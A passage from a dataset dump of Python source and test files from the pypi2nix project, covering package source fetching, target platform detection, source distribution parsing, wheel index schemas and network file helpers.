IntegrationTest\nfrom .framework import TestCommand\n\n\nclass LektorTestCase(IntegrationTest):\n name_of_testcase = \"lektor\"\n code_for_testing = [\"import lektor\"]\n requirements = [\"Lektor\"]\n external_dependencies = [\"libffi\", \"openssl\", \"unzip\"]\n\n def executables_for_testing(self):\n return [TestCommand(command=[\"lektor\", \"--help\"])]\n" }, { "alpha_fraction": 0.7007168531417847, "alphanum_fraction": 0.7397849559783936, "avg_line_length": 26.899999618530273, "blob_id": "498e13f16d27a9d685e95f0466182053bf1904ec", "content_id": "7c4a0fb99a3406f0e2cdbcf30e905c8fe4dda432", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2790, "license_type": "permissive", "max_line_length": 113, "num_lines": 100, "path": "/unittests/test_package_source.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom pypi2nix.nix import Nix\nfrom pypi2nix.package_source import GitSource\nfrom pypi2nix.package_source import HgSource\nfrom pypi2nix.package_source import PathSource\nfrom pypi2nix.package_source import UrlSource\n\nfrom .switches import nix\n\nURL_SOURCE_URL = \"https://github.com/nix-community/pypi2nix/archive/4e85fe7505dd7e703aacc18d9ef45f7e47947a6a.zip\"\nURL_SOURCE_HASH = \"1x3dzqlnryplmxm3z1lnl40y0i2g8n6iynlngq2kkknxj9knjyhv\"\n\n\n@pytest.fixture\ndef git_source():\n return GitSource(\n url=\"https://github.com/nix-community/pypi2nix.git\",\n revision=\"4e85fe7505dd7e703aacc18d9ef45f7e47947a6a\",\n )\n\n\n@pytest.fixture\ndef hg_source(logger):\n return HgSource(\n url=\"https://bitbucket.org/tarek/flake8\", revision=\"a209fb69350c\", logger=logger\n )\n\n\n@pytest.fixture\ndef url_source(logger):\n return UrlSource(url=URL_SOURCE_URL, logger=logger)\n\n\n@pytest.fixture\ndef path_source():\n return PathSource(\"/test/path\")\n\n\n@pytest.fixture\ndef expression_evaluater(logger):\n nix_instance = Nix(logger=logger)\n return lambda expression: nix_instance.evaluate_expression(\n \"let pkgs = import <nixpkgs> {}; in \" + expression\n )\n\n\n@nix\ndef test_git_source_gives_correct_hash_value(git_source):\n assert (\n git_source.hash_value()\n == \"113sngkfi93pdlws1i8kq2rqff10xr1n3z3krn2ilq0fdrddyk96\"\n )\n\n\n@nix\ndef test_git_source_produces_valid_nix_expression(git_source, expression_evaluater):\n expression_evaluater(git_source.nix_expression())\n\n\n@nix\ndef test_hg_source_gives_correct_hash_value(hg_source):\n assert (\n hg_source.hash_value() == \"1n0fzlzmfmynnay0n757yh3qwjd9xxcfi7vq4sxqvsv90c441s7v\"\n )\n\n\n@nix\ndef test_hg_source_produces_valid_nix_expression(hg_source, expression_evaluater):\n expression_evaluater(hg_source.nix_expression())\n\n\n@nix\ndef test_url_source_gives_correct_hash_value(url_source):\n assert url_source.hash_value() == URL_SOURCE_HASH\n\n\n@nix\ndef test_url_source_gives_valid_nix_expression(url_source, expression_evaluater):\n expression_evaluater(url_source.nix_expression())\n\n\ndef test_url_source_nix_expression_contains_specified_hash_when_given(logger):\n # We specify the wrong hash on purpose to see that UrlSource just\n # \"accepts\" the given hash and puts it into the generated nix\n # expression\n url_source = UrlSource(\n URL_SOURCE_URL, hash_value=URL_SOURCE_HASH + \"1\", logger=logger\n )\n assert URL_SOURCE_HASH + \"1\" in url_source.nix_expression()\n\n\n@nix\ndef test_path_source_gives_valid_nix_expression(path_source, expression_evaluater):\n expression_evaluater(path_source.nix_expression())\n\n\ndef test_path_source_paths_with_one_segement_get_dot_appended_for_nix():\n source = PathSource(\"segment\")\n assert source.nix_expression() == \"segment/.\"\n" }, { "alpha_fraction": 0.6243343353271484, "alphanum_fraction": 0.6254639625549316, "avg_line_length": 39.24026107788086, "blob_id": "8d465990d074aeda94c72e87a21124fc66a5824c", "content_id": "4f0e881f11b1d0255b92d162473b60effda150e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6197, "license_type": "no_license", "max_line_length": 93, "num_lines": 154, "path": "/src/pypi2nix/target_platform.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import json\nimport os\nimport shlex\nimport tempfile\nfrom contextlib import contextmanager\nfrom typing import Any\nfrom typing import Dict\nfrom typing import Iterator\nfrom typing import Optional\n\nfrom attr import attrib\nfrom attr import attrs\nfrom packaging.markers import default_environment\n\nfrom pypi2nix.exceptions import UnknownTargetPlatform\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.nix import Nix\nfrom pypi2nix.python_version import PythonVersion\nfrom pypi2nix.python_version import python_version_from_version_string\n\n\nclass PlatformGenerator:\n def __init__(self, nix: Nix, logger: Logger) -> None:\n self.nix = nix\n self.logger = logger\n\n def from_python_version(self, version: PythonVersion) -> \"TargetPlatform\":\n with self._python_environment_nix(version.derivation_name()) as nix_file:\n default_environment_string = self.nix.shell(\n command=\"python -c {command}\".format(\n command=shlex.quote(self._python_command_for_default_environment())\n ),\n derivation_path=nix_file,\n )\n return self._target_platform_from_default_environment_string(\n default_environment_string, python_version=version\n )\n\n def current_platform(self) -> Optional[\"TargetPlatform\"]:\n environment_json_string = json.dumps(default_environment())\n environment = self._load_default_environment(environment_json_string)\n python_version = python_version_from_version_string(\n environment[\"python_version\"]\n )\n if python_version is None:\n return None\n else:\n return self._target_platform_from_default_environment_string(\n environment_json_string, python_version=python_version\n )\n\n def _python_command_for_default_environment(self) -> str:\n return \";\".join(\n [\n \"import json\",\n \"from setuptools._vendor.packaging.markers import default_environment\",\n \"print(json.dumps(default_environment()))\",\n ]\n )\n\n def _target_platform_from_default_environment_string(\n self, json_string: str, python_version: PythonVersion\n ) -> \"TargetPlatform\":\n default_environment = self._load_default_environment(json_string)\n return TargetPlatform(\n python_version=default_environment[\"python_version\"],\n nixpkgs_python_version=python_version,\n python_full_version=default_environment[\"python_full_version\"],\n implementation_version=default_environment[\"implementation_version\"],\n os_name=default_environment[\"os_name\"],\n implementation_name=default_environment[\"implementation_name\"],\n sys_platform=default_environment[\"sys_platform\"],\n platform_machine=default_environment[\"platform_machine\"],\n platform_python_implementation=default_environment[\n \"platform_python_implementation\"\n ],\n platform_release=default_environment[\"platform_release\"],\n platform_system=default_environment[\"platform_system\"],\n platform_version=default_environment[\"platform_version\"],\n )\n\n def _load_default_environment(self, json_string: str) -> Dict[str, str]:\n result: Dict[str, str] = dict()\n loaded_json = self._parse_target_platform_string(json_string)\n if not isinstance(loaded_json, dict):\n return result\n for key, value in loaded_json.items():\n if isinstance(key, str) and isinstance(value, str):\n result[key] = value\n return result\n\n def _parse_target_platform_string(self, json_string: str) -> Any:\n try:\n return json.loads(json_string)\n except json.decoder.JSONDecodeError:\n error_message = (\n \"Could not detect target platform, pypi2nix was unable to parse \"\n \"the following string as json: \" + json_string\n )\n self.logger.error(error_message)\n raise UnknownTargetPlatform(error_message)\n\n @contextmanager\n def _python_environment_nix(self, nixpkgs_attribute_name: str) -> Iterator[str]:\n fd, path = tempfile.mkstemp()\n with open(fd, \"w\") as f:\n f.write(\n \" \".join(\n [\n \"with import <nixpkgs> {{}};\",\n \"stdenv.mkDerivation {{\",\n 'name = \"python3-env\";',\n \"buildInputs = with {interpreter}.pkgs; [{interpreter} {packages}];\",\n \"}}\",\n ]\n ).format(interpreter=nixpkgs_attribute_name, packages=\"setuptools\")\n )\n try:\n yield path\n finally:\n os.remove(path)\n\n\n@attrs\nclass TargetPlatform:\n python_version: str = attrib()\n nixpkgs_python_version: PythonVersion = attrib()\n python_full_version: str = attrib()\n implementation_version: str = attrib()\n os_name: str = attrib()\n sys_platform: str = attrib()\n implementation_name: str = attrib()\n platform_machine: str = attrib()\n platform_python_implementation: str = attrib()\n platform_release: str = attrib()\n platform_system: str = attrib()\n platform_version: str = attrib()\n\n def environment_dictionary(self) -> Dict[str, Any]:\n dictionary = {}\n dictionary[\"python_version\"] = self.python_version\n dictionary[\"python_full_version\"] = self.python_full_version\n dictionary[\"implementation_version\"] = self.implementation_version\n dictionary[\"os_name\"] = self.os_name\n dictionary[\"sys_platform\"] = self.sys_platform\n dictionary[\"platform_machine\"] = self.platform_machine\n dictionary[\n \"platform_python_implementation\"\n ] = self.platform_python_implementation\n dictionary[\"platform_release\"] = self.platform_release\n dictionary[\"platform_system\"] = self.platform_system\n dictionary[\"platform_version\"] = self.platform_version\n dictionary[\"implementation_name\"] = self.implementation_name\n return dictionary\n" }, { "alpha_fraction": 0.8039215803146362, "alphanum_fraction": 0.8039215803146362, "avg_line_length": 24.5, "blob_id": "37ddd53f6467c00364d4f5a016cc13ed6c8a6598", "content_id": "cf3aefaf025656eb3d35a06f63d5c0a4d5a00aa3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 51, "license_type": "no_license", "max_line_length": 41, "num_lines": 2, "path": "/src/pypi2nix/package/exceptions.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "class DistributionNotDetected(Exception):\n pass\n" }, { "alpha_fraction": 0.6046406626701355, "alphanum_fraction": 0.6070513725280762, "avg_line_length": 35.07065200805664, "blob_id": "f322b51f402e99f2209bc2c36b237687f853b914", "content_id": "e72af4577708f21b01c45d56fcb9ecbec39a6d4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6637, "license_type": "no_license", "max_line_length": 188, "num_lines": 184, "path": "/src/pypi2nix/source_distribution.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\nfrom typing import Iterable\nfrom typing import Optional\n\nfrom packaging.utils import canonicalize_name\n\nfrom pypi2nix.archive import Archive\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.package import DistributionNotDetected\nfrom pypi2nix.package import HasBuildDependencies\nfrom pypi2nix.package import PackageMetadata\nfrom pypi2nix.package import PyprojectToml\nfrom pypi2nix.package import SetupCfg\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.requirements import Requirement\nfrom pypi2nix.requirements import VersionRequirement\nfrom pypi2nix.target_platform import TargetPlatform\n\n\nclass SourceDistribution(HasBuildDependencies):\n def __init__(\n self,\n name: str,\n logger: Logger,\n requirement_parser: RequirementParser,\n pyproject_toml: Optional[PyprojectToml] = None,\n setup_cfg: Optional[SetupCfg] = None,\n ) -> None:\n self.name = canonicalize_name(name)\n self.pyproject_toml = pyproject_toml\n self.setup_cfg = setup_cfg\n self.logger = logger\n self.requirement_parser = requirement_parser\n\n @property\n def package_format(self) -> str:\n if self.pyproject_toml:\n return \"pyproject\"\n else:\n return \"setuptools\"\n\n @classmethod\n def from_archive(\n source_distribution,\n archive: Archive,\n logger: Logger,\n requirement_parser: RequirementParser,\n ) -> \"SourceDistribution\":\n with archive.extracted_files() as extraction_directory:\n first_level_paths = os.listdir(extraction_directory)\n if len(first_level_paths) != 1:\n raise DistributionNotDetected(\n f\"Multiple package directories or files extracted from {archive}\"\n )\n package_dir = os.path.join(extraction_directory, first_level_paths[0])\n if not os.path.isdir(package_dir):\n raise DistributionNotDetected(\n f\"No package directory could be extracted from source distribution {archive}\"\n )\n extracted_files = [\n os.path.join(package_dir, file_name)\n for file_name in os.listdir(package_dir)\n if os.path.isfile(os.path.join(package_dir, file_name))\n ]\n setup_cfg = source_distribution.get_setup_cfg(\n extracted_files, logger, requirement_parser\n )\n metadata = source_distribution._get_package_metadata(package_dir)\n name = source_distribution._get_name(setup_cfg, metadata, archive)\n pyproject_toml = source_distribution.get_pyproject_toml(\n name, extracted_files, logger, requirement_parser\n )\n return source_distribution(\n name=name,\n pyproject_toml=pyproject_toml,\n setup_cfg=setup_cfg,\n logger=logger,\n requirement_parser=requirement_parser,\n )\n\n @classmethod\n def get_pyproject_toml(\n _,\n name: str,\n extracted_files: Iterable[str],\n logger: Logger,\n requirement_parser: RequirementParser,\n ) -> Optional[PyprojectToml]:\n pyproject_toml_candidates = [\n filepath\n for filepath in extracted_files\n if os.path.basename(filepath) == \"pyproject.toml\"\n ]\n if pyproject_toml_candidates:\n with open(pyproject_toml_candidates[0]) as f:\n content = f.read()\n return PyprojectToml(\n name=name,\n file_content=content,\n requirement_parser=requirement_parser,\n logger=logger,\n )\n else:\n return None\n\n @classmethod\n def get_setup_cfg(\n _,\n extracted_files: Iterable[str],\n logger: Logger,\n requirement_parser: RequirementParser,\n ) -> Optional[SetupCfg]:\n setup_cfg_candidates = [\n filepath\n for filepath in extracted_files\n if os.path.basename(filepath) == \"setup.cfg\"\n ]\n if setup_cfg_candidates:\n return SetupCfg(\n setup_cfg_path=setup_cfg_candidates[0],\n logger=logger,\n requirement_parser=requirement_parser,\n )\n else:\n return None\n\n @classmethod\n def _get_package_metadata(self, path: str) -> Optional[PackageMetadata]:\n try:\n return PackageMetadata.from_package_directory(path=path)\n except DistributionNotDetected:\n return None\n\n @classmethod\n def _get_name(\n self,\n setup_cfg: Optional[SetupCfg],\n metadata: Optional[PackageMetadata],\n archive: Archive,\n ) -> str:\n if setup_cfg and metadata:\n if setup_cfg.name != metadata.name and setup_cfg.name is not None:\n raise DistributionNotDetected(\n f\"Conflicting name information from setup.cfg ({setup_cfg.name}) and PKG-INFO ({metadata.name}) in {archive}\"\n )\n else:\n return metadata.name\n elif setup_cfg and setup_cfg.name is not None:\n return setup_cfg.name\n elif metadata is not None:\n return metadata.name\n else:\n raise DistributionNotDetected(\n f\"Neither PKG-INFO nor setup.cfg are present in {archive}\"\n )\n\n def to_loose_requirement(self) -> Requirement:\n return VersionRequirement(\n name=self.name,\n versions=[],\n extras=set(),\n environment_markers=None,\n logger=self.logger,\n )\n\n def build_dependencies(self, target_platform: TargetPlatform) -> RequirementSet:\n build_dependencies = RequirementSet(target_platform)\n if self.pyproject_toml is not None:\n build_dependencies += self.pyproject_toml.build_dependencies(\n target_platform\n )\n if self.setup_cfg is not None:\n build_dependencies += self.setup_cfg.build_dependencies(target_platform)\n return build_dependencies.filter(\n lambda requirement: requirement.name != self.name\n )\n\n def __str__(self) -> str:\n return f\"SourceDistribution<name={self.name}>\"\n\n def __repr__(self) -> str:\n return f\"SourceDistribution(name={self.name}, logger={self.logger}, requirement_parser={self.requirement_parser}, pyproject_toml={self.pyproject_toml}, setup_cfg={self.setup_cfg})\"\n" }, { "alpha_fraction": 0.5592864751815796, "alphanum_fraction": 0.5645330548286438, "avg_line_length": 32.1478271484375, "blob_id": "b94b6a0347a458e9e3d9a5b9989809043cad2ac6", "content_id": "2186f20abce243ae224b170da3b631c90ce11eca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3812, "license_type": "no_license", "max_line_length": 102, "num_lines": 115, "path": "/src/pypi2nix/metadata_fetcher.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "\"\"\"Parse metadata from .dist-info directories in a wheelhouse.\"\"\"\n# flake8: noqa: E501\n\nimport email\nimport hashlib\nimport json\nimport os.path\nimport tempfile\nfrom typing import Any\nfrom typing import Dict\nfrom typing import Iterable\nfrom typing import List\nfrom urllib.request import urlopen\n\nimport click\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.package_source import UrlSource\nfrom pypi2nix.pypi import Pypi\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.requirements import Requirement\nfrom pypi2nix.source_distribution import SourceDistribution\nfrom pypi2nix.sources import Sources\nfrom pypi2nix.target_platform import TargetPlatform\nfrom pypi2nix.utils import cmd\nfrom pypi2nix.utils import prefetch_git\nfrom pypi2nix.wheel import Wheel\n\n\nclass MetadataFetcher:\n def __init__(\n self,\n sources: Sources,\n logger: Logger,\n requirement_parser: RequirementParser,\n pypi: Pypi,\n ) -> None:\n self.sources = sources\n self.logger = logger\n self.requirement_parser = requirement_parser\n self.pypi = pypi\n\n def main(\n self,\n wheel_paths: Iterable[str],\n target_platform: TargetPlatform,\n source_distributions: Dict[str, SourceDistribution],\n ) -> List[Wheel]:\n \"\"\"Extract packages metadata from wheels dist-info folders.\n \"\"\"\n output = \"\"\n metadata: List[Wheel] = []\n\n self.logger.info(\n \"-- sources ---------------------------------------------------------------\"\n )\n for name, source in self.sources.items():\n self.logger.info(\"{name}, {source}\".format(name=name, source=name))\n self.logger.info(\n \"--------------------------------------------------------------------------\"\n )\n\n wheels = []\n for wheel_path in wheel_paths:\n\n self.logger.debug(\"|-> from %s\" % os.path.basename(wheel_path))\n\n wheel_metadata = Wheel.from_wheel_directory_path(\n wheel_path, target_platform, self.logger, self.requirement_parser\n )\n if not wheel_metadata:\n continue\n\n if wheel_metadata.name in source_distributions:\n source_distribution = source_distributions[wheel_metadata.name]\n wheel_metadata.add_build_dependencies(\n source_distribution.build_dependencies(target_platform)\n )\n wheel_metadata.package_format = source_distribution.package_format\n\n wheels.append(wheel_metadata)\n\n self.logger.debug(\n \"-- wheel_metadata --------------------------------------------------------\"\n )\n self.logger.debug(\n json.dumps(wheel_metadata.to_dict(), sort_keys=True, indent=4)\n )\n self.logger.debug(\n \"--------------------------------------------------------------------------\"\n )\n\n self.process_wheel(wheel_metadata)\n return wheels\n\n def process_wheel(self, wheel: Wheel) -> None:\n if wheel.name not in self.sources:\n release = self.pypi.get_source_release(wheel.name, wheel.version)\n if release:\n source = UrlSource(\n url=release.url,\n logger=self.logger,\n hash_value=release.sha256_digest,\n )\n self.sources.add(wheel.name, source)\n else:\n self.logger.error(\n f\"Failed to query pypi for release name=`{wheel.name}`, version=`{wheel.version}`\"\n )\n raise MetadataFetchingFailed()\n\n\nclass MetadataFetchingFailed(Exception):\n pass\n" }, { "alpha_fraction": 0.6538860201835632, "alphanum_fraction": 0.6901554465293884, "avg_line_length": 24.394737243652344, "blob_id": "212800e656be576e9426d57275337664e43cff9b", "content_id": "b9d082a309f1179ec83e9b0fb77f683a37d547e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 965, "license_type": "no_license", "max_line_length": 87, "num_lines": 38, "path": "/src/pypi2nix/python_version.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from enum import Enum\nfrom enum import unique\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\n\n\n@unique\nclass PythonVersion(Enum):\n python35 = \"python35\"\n python36 = \"python36\"\n python37 = \"python37\"\n python38 = \"python38\"\n python3 = \"python3\"\n\n def nixpkgs_attribute(self) -> str:\n return self.value # type: ignore\n\n def derivation_name(self) -> str:\n return self.value # type: ignore\n\n def major_version(self) -> str:\n return self.derivation_name().replace(\"python\", \"\")[0]\n\n\n_PYTHON_VERSIONS: Dict[str, PythonVersion] = {\n \"3.5\": PythonVersion.python35,\n \"3.6\": PythonVersion.python36,\n \"3.7\": PythonVersion.python37,\n \"3.8\": PythonVersion.python38,\n}\n\n\ndef python_version_from_version_string(version_string: str) -> Optional[PythonVersion]:\n return _PYTHON_VERSIONS.get(version_string)\n\n\navailable_python_versions: List[str] = [version.name for version in PythonVersion]\n" }, { "alpha_fraction": 0.446841299533844, "alphanum_fraction": 0.4653312861919403, "avg_line_length": 23.037036895751953, "blob_id": "40df1786414831ab5f3516f8e5bd6ae48bee844d", "content_id": "4da0d166d594fc9f6ed034e1268da71a265c61e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 649, "license_type": "no_license", "max_line_length": 56, "num_lines": 27, "path": "/src/pypi2nix/wheels/schema.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "URL_SCHEMA = {\n \"type\": \"object\",\n \"properties\": {\n \"sha256\": {\"type\": \"string\"},\n \"url\": {\"type\": \"string\"},\n \"__type__\": {\"const\": \"fetchurl\",},\n },\n \"required\": [\"sha256\", \"url\", \"__type__\"],\n}\n\nGIT_SCHEMA = {\n \"type\": \"object\",\n \"properties\": {\n \"sha256\": {\"type\": \"string\"},\n \"url\": {\"type\": \"string\"},\n \"rev\": {\"type\": \"string\"},\n \"__type__\": {\"const\": \"fetchgit\"},\n },\n \"required\": [\"sha256\", \"url\", \"rev\", \"__type__\"],\n}\n\nINDEX_ITEM_SCHEMA = {\"anyOf\": [URL_SCHEMA, GIT_SCHEMA,]}\n\nINDEX_SCHEMA = {\n \"type\": \"object\",\n \"additionalProperties\": INDEX_ITEM_SCHEMA,\n}\n" }, { "alpha_fraction": 0.7270854711532593, "alphanum_fraction": 0.7466529607772827, "avg_line_length": 30.322580337524414, "blob_id": "9fd3c0fce5f1bb305df9055a2f79874458dcfc7f", "content_id": "09c18eba6d17215bfc0030762cd673148a2bf7b7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 971, "license_type": "permissive", "max_line_length": 88, "num_lines": 31, "path": "/unittests/test_python_version.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom pypi2nix.python_version import PythonVersion\nfrom pypi2nix.python_version import python_version_from_version_string\nfrom pypi2nix.target_platform import PlatformGenerator\n\nfrom .switches import nix\n\n\n@pytest.mark.parametrize(\"python_version\", PythonVersion)\n@nix\ndef test_available_python_versions_exist_in_nixpkgs(\n python_version: PythonVersion, platform_generator: PlatformGenerator\n):\n target_platform = platform_generator.from_python_version(python_version)\n assert target_platform is not None\n\n\n@pytest.mark.parametrize(\n \"version_string, expected_python_version\",\n [\n (\"3.5\", PythonVersion.python35),\n (\"3.6\", PythonVersion.python36),\n (\"3.7\", PythonVersion.python37),\n (\"3.8\", PythonVersion.python38),\n ],\n)\ndef test_can_get_python_version_from_version_string(\n version_string, expected_python_version\n):\n assert python_version_from_version_string(version_string) == expected_python_version\n" }, { "alpha_fraction": 0.7230088710784912, "alphanum_fraction": 0.7274336218833923, "avg_line_length": 33.24242401123047, "blob_id": "bb19888a3d6d33a41e3e1e9344ae18b298197570", "content_id": "a37fc4491f9c2f18c525dae437b211e02d1f5109", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1130, "license_type": "no_license", "max_line_length": 63, "num_lines": 33, "path": "/src/pypi2nix/configuration.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import List\nfrom typing import Optional\n\nfrom attr import attrib\nfrom attr import attrs\n\nfrom pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.logger import Verbosity\nfrom pypi2nix.overrides import Overrides\nfrom pypi2nix.path import Path\nfrom pypi2nix.python_version import PythonVersion\n\n\n@attrs\nclass ApplicationConfiguration:\n verbosity: Verbosity = attrib()\n nix_executable_directory: Optional[str] = attrib()\n nix_path: List[str] = attrib()\n extra_build_inputs: List[str] = attrib()\n emit_extra_build_inputs: bool = attrib()\n extra_environment: str = attrib()\n enable_tests: bool = attrib()\n python_version: PythonVersion = attrib()\n requirement_files: List[str] = attrib()\n requirements: List[str] = attrib()\n setup_requirements: List[str] = attrib()\n overrides: List[Overrides] = attrib()\n wheels_caches: List[str] = attrib()\n output_basename: str = attrib()\n project_directory: Path = attrib()\n target_directory: str = attrib()\n dependency_graph_output_location: Optional[Path] = attrib()\n dependency_graph_input: DependencyGraph = attrib()\n" }, { "alpha_fraction": 0.5500580072402954, "alphanum_fraction": 0.5624275207519531, "avg_line_length": 31.746835708618164, "blob_id": "7bdf3150415fc22799f5b4134a5826dc6fd68e83", "content_id": "01638817a40ee1c64432ff6c9efd3d285389b099", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2587, "license_type": "no_license", "max_line_length": 86, "num_lines": 79, "path": "/src/pypi2nix/wheels/__init__.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import json\nimport os.path\nfrom collections import namedtuple\nfrom contextlib import contextmanager\nfrom typing import Any\nfrom typing import Dict\nfrom typing import Iterator\nfrom typing import Union\n\nfrom attr import attrib\nfrom attr import attrs\nfrom jsonschema import ValidationError\nfrom jsonschema import validate\n\nfrom pypi2nix.logger import Logger\n\nfrom .schema import GIT_SCHEMA\nfrom .schema import INDEX_SCHEMA\nfrom .schema import URL_SCHEMA\n\n\n@attrs\nclass Index:\n UrlEntry = namedtuple(\"UrlEntry\", [\"url\", \"sha256\"])\n GitEntry = namedtuple(\"GitEntry\", [\"url\", \"sha256\", \"rev\"])\n Entry = Union[UrlEntry, GitEntry]\n\n logger: Logger = attrib()\n path: str = attrib(default=os.path.join(os.path.dirname(__file__), \"index.json\"))\n\n def __getitem__(self, key: str) -> \"Index.Entry\":\n with self._index_json() as index:\n entry = index[key]\n if self._is_schema_valid(entry, URL_SCHEMA):\n return Index.UrlEntry(url=entry[\"url\"], sha256=entry[\"sha256\"])\n elif self._is_schema_valid(entry, GIT_SCHEMA):\n return Index.GitEntry(\n url=entry[\"url\"], sha256=entry[\"sha256\"], rev=entry[\"rev\"]\n )\n else:\n raise Exception()\n\n def __setitem__(self, key: str, value: \"Index.Entry\") -> None:\n with self._index_json(write=True) as index:\n if isinstance(value, self.UrlEntry):\n index[key] = {\n \"url\": value.url,\n \"sha256\": value.sha256,\n \"__type__\": \"fetchurl\",\n }\n if isinstance(value, self.GitEntry):\n index[key] = {\n \"url\": value.url,\n \"sha256\": value.sha256,\n \"rev\": value.rev,\n \"__type__\": \"fetchgit\",\n }\n\n def is_valid(self) -> bool:\n with self._index_json() as index:\n return self._is_schema_valid(index, INDEX_SCHEMA)\n\n @contextmanager\n def _index_json(self, write: bool = False) -> Iterator[Dict[str, Dict[str, str]]]:\n with open(self.path) as f:\n index = json.load(f)\n yield index\n if write:\n with open(self.path, \"w\") as f:\n json.dump(index, f, sort_keys=True, indent=4)\n\n def _is_schema_valid(self, json_value: Any, schema: Any) -> bool:\n try:\n validate(json_value, schema)\n except ValidationError as e:\n self.logger.error(str(e))\n return False\n else:\n return True\n" }, { "alpha_fraction": 0.5835829973220825, "alphanum_fraction": 0.5865787863731384, "avg_line_length": 36.088890075683594, "blob_id": "af20f65a461ab36a1b64bd01d8272968208d4b72", "content_id": "e951d9c3b5303d76e8524a8be54740417a52c51e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1669, "license_type": "no_license", "max_line_length": 84, "num_lines": 45, "path": "/src/pypi2nix/package/pyproject.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import toml\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.requirement_parser import ParsingFailed\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\n\nfrom .interfaces import HasBuildDependencies\n\n\nclass PyprojectToml(HasBuildDependencies):\n def __init__(\n self,\n name: str,\n file_content: str,\n logger: Logger,\n requirement_parser: RequirementParser,\n ) -> None:\n self.pyproject_toml = toml.loads(file_content)\n self.logger = logger\n self.requirement_parser = requirement_parser\n self.name = name\n\n def build_dependencies(self, target_platform: TargetPlatform) -> RequirementSet:\n requirement_set = RequirementSet(target_platform)\n if self.pyproject_toml is not None:\n for build_input in self.pyproject_toml.get(\"build-system\", {}).get(\n \"requires\", []\n ):\n try:\n requirement = self.requirement_parser.parse(build_input)\n except ParsingFailed as e:\n self.logger.warning(\n \"Failed to parse build dependency of `{name}`\".format(\n name=self.name\n )\n )\n self.logger.warning(\n \"Possible reason: `{reason}`\".format(reason=e.reason)\n )\n else:\n if requirement.applies_to_target(target_platform):\n requirement_set.add(requirement)\n return requirement_set\n" }, { "alpha_fraction": 0.5756263732910156, "alphanum_fraction": 0.5886173844337463, "avg_line_length": 27.610618591308594, "blob_id": "ccaf9437922df4dc8790d861046bb578b609d028", "content_id": "dd9343bc7949b616864d4d1a1ae531a59d63374f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3233, "license_type": "no_license", "max_line_length": 80, "num_lines": 113, "path": "/src/pypi2nix/network_file.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os.path\nimport tempfile\nfrom abc import ABCMeta\nfrom abc import abstractmethod\nfrom typing import Dict\nfrom typing import Optional\nfrom urllib.request import urlopen\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.memoize import memoize\nfrom pypi2nix.utils import cmd\nfrom pypi2nix.utils import prefetch_git\nfrom pypi2nix.utils import prefetch_url\n\n\nclass NetworkFile(metaclass=ABCMeta):\n @abstractmethod\n def nix_expression(self) -> str:\n pass\n\n @abstractmethod\n def fetch(self) -> str:\n pass\n\n\nclass UrlTextFile(NetworkFile):\n def __init__(\n self,\n url: str,\n logger: Logger,\n sha256: Optional[str] = None,\n name: Optional[str] = None,\n ) -> None:\n self.url = url\n self._sha256 = sha256\n self._logger = logger\n self._name = name\n\n def nix_expression(self) -> str:\n fetchurl_arguments = f'url = \"{self.url}\";'\n fetchurl_arguments += f'sha256 = \"{self.sha256}\";'\n if self._name:\n fetchurl_arguments += f'name = \"{self._name}\";'\n return f\"pkgs.fetchurl {{ {fetchurl_arguments} }}\"\n\n @property # type: ignore\n @memoize\n def sha256(self) -> str:\n if self._sha256:\n return self._sha256\n else:\n return prefetch_url(self.url, self._logger, name=self._name)\n\n def fetch(self) -> str:\n with urlopen(self.url) as content:\n return content.read().decode(\"utf-8\") # type: ignore\n\n\nclass GitTextFile(NetworkFile):\n def __init__(\n self, repository_url: str, revision_name: str, path: str, logger: Logger\n ) -> None:\n self.repository_url = repository_url\n self._revision_name = revision_name\n self.path = path\n self._logger = logger\n\n def nix_expression(self) -> str:\n fetchgit_arguments = f'url = \"{self.repository_url}\";'\n fetchgit_arguments += f'sha256 = \"{self.sha256}\";'\n fetchgit_arguments += f'rev = \"{self.revision}\";'\n fetchgit_expression = f\"pkgs.fetchgit {{ 